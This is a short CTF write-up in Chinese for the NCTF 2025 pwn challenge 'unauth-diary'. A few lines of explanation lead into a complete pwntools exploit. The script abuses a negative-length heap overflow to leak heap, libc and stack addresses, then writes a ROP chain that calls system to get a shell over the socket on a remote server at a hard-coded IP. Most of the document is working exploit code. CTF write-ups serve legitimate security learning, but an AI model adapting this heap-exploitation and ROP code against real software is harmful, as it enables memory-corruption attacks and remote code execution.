2025 03.22 NCTF wp - LaoGong

2025年3月24日修改

2025年3月23日创建

590

825

Pwn

unauth-diary

申请新的堆块的时候，length可以写-1，这样有了负数溢出，而且申请的时候用的是len+1，malloc不会出错。​

common.docs_name - LarkCCM_Docs_Menu_Image

因此，在一个堆块上就可以进行向后的任意溢出。考虑到题目给的是覆盖写入，而且一定在最后一个字节写入一个0，因此没泄露时，可以把下一个堆块的指针的低字节改成0，构造一下使其指向某个可以泄露堆地址的地方。​

泄露后，就可以把同一个指针任意指向，进行任意读写。

最后采用_environ泄露栈地址，打rop。

代码块

from pwn import *​
#context.log_level="debug"​
context.arch="amd64"​
heap_base=0​
def add(p,sz,ctt):​
    p.recvuntil(b"> ")​
    p.sendline(b"1")​
    p.recvuntil(b"length:\n")​
    p.sendline(str(sz).encode())​
    p.recvuntil(b"content:\n")​
    p.send(ctt)​
​
def rm(p,idx):​
    p.recvuntil(b"> ")​
    p.sendline(b"2")​
    p.recvuntil(b"index:\n")​
    p.sendline(str(idx).encode())​
​
def edt(p,idx,ctt):​
    p.recvuntil(b"> ")​
    p.sendline(b"3")​
    p.recvuntil(b"index:\n")​
    p.sendline(str(idx).encode())​
    p.recvuntil(b"content:\n")​
    p.send(ctt)​
    ​
def show(p,idx):​
    p.recvuntil(b"> ")​
    p.sendline(b"4")​
    p.recvuntil(b"index:\n")​
    p.sendline(str(idx).encode())​
​
def get_fake_io(faddr,iowfjmp,rip):​
​
    data = flat({​
        0:u32(b" sh;"),​
        0xd8:iowfjmp,​
        0x8:0,​
        0x10:1,​
        0xa0:faddr+0x100,​
        ​
        0x100:{​
            0x18: 0, # f->_wide_data->_IO_write_base​
            0x30: 0, # f->_wide_data->_IO_buf_base​
            0xe0: faddr+0x200​
        },​
        0x200:{​
            0x68:rip​
        },​
    })​
    return data​
​
​
def sol(p):​
​
​
    add(p,0x37,b"sh 0>&4 1<&4\n")#0​
    add(p,-1,b"test1\n")#1​
    add(p,0x17,b"test2\n")#2​
    add(p,0x410,b"test3\n")#3​
    add(p,0x17,b"test4\n")#4​
    rm(p,3)​
​
    pld1=p64(0)*3+p64(0x21)+b"\n"​
    edt(p,1,pld1)​
    show(p,2)​
    p.recvuntil(b"Content:\n")​
    heap_leak=u64(p.recv(8))​
    heap_base=(heap_leak>>12)<<12​
    print("[+] heap_base =",hex(heap_base))​
​
​
    pld1=p64(0)*3+p64(0x21)+p64(heap_base+0x3a0)+b"\x18\n"​
    edt(p,1,pld1)​
    show(p,2)​
​
    libc_off=0x203b20​
​
    p.recvuntil(b"Content:\n")​
    libc_leak=u64(p.recv(8))​
    print("[+] libc_leak =",hex(libc_leak))​
​
    libc_base=libc_leak-libc_off​
    print("[+] libc_base =",hex(libc_base))​
​
    system=0x7545ff858750-0x7545ff800000+libc_base​
    stackoff=0x250​
    envaddr=0x719fb880ad58-0x719fb8600000+libc_base​
​
    pld1=p64(0)*3+p64(0x21)+p64(envaddr)+b"\x18\n"​
    edt(p,1,pld1)​
    show(p,2)​
​
    p.recvuntil(b"Content:\n")​
    stack_leak=u64(p.recv(8))​
    stack_addr=stack_leak-0x250​
    print("[+] stack_addr =",hex(stack_addr))​
​
    p_rdi_r=0x000000000010f75b+libc_base​
​
    pld1=p64(0)*3+p64(0x21)+p64(stack_addr)+b"\xff\n"​
    rop=b"".join([​
        p64(p_rdi_r),​
        p64(heap_base+0x2c0),​
        p64(p_rdi_r+1),​
        p64(system),​
​
    ])​
    edt(p,1,pld1)​
    edt(p,2,rop+b"\n")​
​
    p.interactive()​
​
​
p=remote("39.106.16.204",15586)​
sol(p)​
​

2025 03.22 NCTF wp - LaoGong​

2025 03.22 NCTF wp - LaoGong